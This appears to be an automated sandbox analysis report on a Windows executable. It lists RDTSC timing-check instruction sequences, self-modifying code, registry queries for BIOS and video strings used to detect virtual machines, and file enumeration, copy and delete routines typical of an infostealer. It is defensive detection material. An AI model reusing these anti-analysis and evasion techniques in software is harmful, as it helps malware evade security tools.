              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7744 second address: 13D774A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D774A second address: 13D774E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D774E second address: 13D775A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FEA188F2DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D775A second address: 13D7764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7764 second address: 13D7768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF190 second address: 13DF1A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDDh 0x00000007 jc 00007FEA188A9BD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF438 second address: 13DF449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA188F2DB6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF449 second address: 13DF46C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE2h 0x00000007 jmp 00007FEA188A9BDDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF46C second address: 13DF4AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FEA188F2DC8h 0x00000010 jmp 00007FEA188F2DC5h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4AD second address: 13DF4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4B1 second address: 13DF4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4B5 second address: 13DF4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF4BB second address: 13DF4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007FEA188F2DB6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB53C second address: 13EB540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB540 second address: 13EB563 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FEA188F2DC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FEA188F2DB6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB563 second address: 13EB56F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB56F second address: 13EB573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB573 second address: 13EB591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FEA188A9BD6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EAF1A second address: 13EAF72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DC1h 0x00000008 jmp 00007FEA188F2DBAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FEA188F2DBFh 0x0000001e popad 0x0000001f jne 00007FEA188F2DCEh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EAF72 second address: 13EAF98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FEA188A9BE8h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FEA188A9BD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F15A0 second address: 13F15A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F15A4 second address: 13F15D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 jp 00007FEA188A9BDCh 0x00000016 jnp 00007FEA188A9BD6h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDA62 second address: 13FDA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FEA188F2DBAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEA188F2DC1h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDA91 second address: 13FDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FEA188A9BD6h 0x0000000c jne 00007FEA188A9BD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400580 second address: 14005BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC3h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jl 00007FEA188F2DB6h 0x00000011 jnp 00007FEA188F2DB6h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FEA188F2DC3h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005BB second address: 14005E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDEh 0x00000007 jmp 00007FEA188A9BE5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005E7 second address: 14005F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407582 second address: 1407586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407586 second address: 140758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 140DB7E second address: 140DBAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FEA188A9BDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FEA188A9BD8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 popad 0x0000001a pushad 0x0000001b jl 00007FEA188A9BDAh 0x00000021 pushad 0x00000022 popad 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 141FDB1 second address: 141FDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 141FDB7 second address: 141FDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 142C0D3 second address: 142C0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 142C0D9 second address: 142C0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 142C0DD second address: 142C0E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1441C0B second address: 1441C17 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEA188A9BD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1441C17 second address: 1441C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FEA188F2DC9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14424B9 second address: 14424DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FEA188A9BDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14424DC second address: 14424EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FEA188F2DB6h 0x0000000c jl 00007FEA188F2DB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14426A3 second address: 14426A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14426A7 second address: 14426AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14427E0 second address: 14427F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 js 00007FEA188A9BD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14443D5 second address: 1444409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FEA188F2DBDh 0x0000000d pop eax 0x0000000e jmp 00007FEA188F2DC9h 0x00000013 popad 0x00000014 push esi 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1445B13 second address: 1445B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1445B17 second address: 1445B37 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DBAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEA188F2DBFh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1445B37 second address: 1445B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jbe 00007FEA188A9BF1h 0x0000000e jmp 00007FEA188A9BE5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144864D second address: 1448652 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144896F second address: 14489D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FEA188A9BD8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push dword ptr [ebp+122D2421h] 0x00000029 mov edx, dword ptr [ebp+122D224Ch] 0x0000002f call 00007FEA188A9BD9h 0x00000034 jno 00007FEA188A9BEEh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d je 00007FEA188A9BD8h 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14489D3 second address: 14489D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC0293 second address: 4FC02E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FEA188A9BE7h 0x0000000c add ecx, 17063DFEh 0x00000012 jmp 00007FEA188A9BE9h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEA188A9BDCh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC02E1 second address: 4FC032A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEA188F2DC1h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FEA188F2DC1h 0x0000000f adc si, 8196h 0x00000014 jmp 00007FEA188F2DC1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC032A second address: 4FC034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 call 00007FEA188A9BDAh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEA188A9BDCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC0387 second address: 4FC03D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FEA188F2DBBh 0x00000012 pushfd 0x00000013 jmp 00007FEA188F2DC8h 0x00000018 or ax, D338h 0x0000001d jmp 00007FEA188F2DBBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC03D0 second address: 4FC0434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA188A9BE1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 push edi 0x00000015 jmp 00007FEA188A9BE4h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEA188A9BE3h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC0434 second address: 4FC043A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC043A second address: 4FC0449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188A9BDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC0449 second address: 4FC046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC046F second address: 4FC0473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FC0473 second address: 4FC0479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1362AEE second address: 1362AF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1362AF7 second address: 1362AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1362EBD second address: 1362ECB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11AF965 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11AF892 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 135E954 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13E0D52 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-27080
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_0-25898
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F718A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F73910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F71269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_00F71250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F7E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_00F7CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_00F723A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 0_2_00F72390
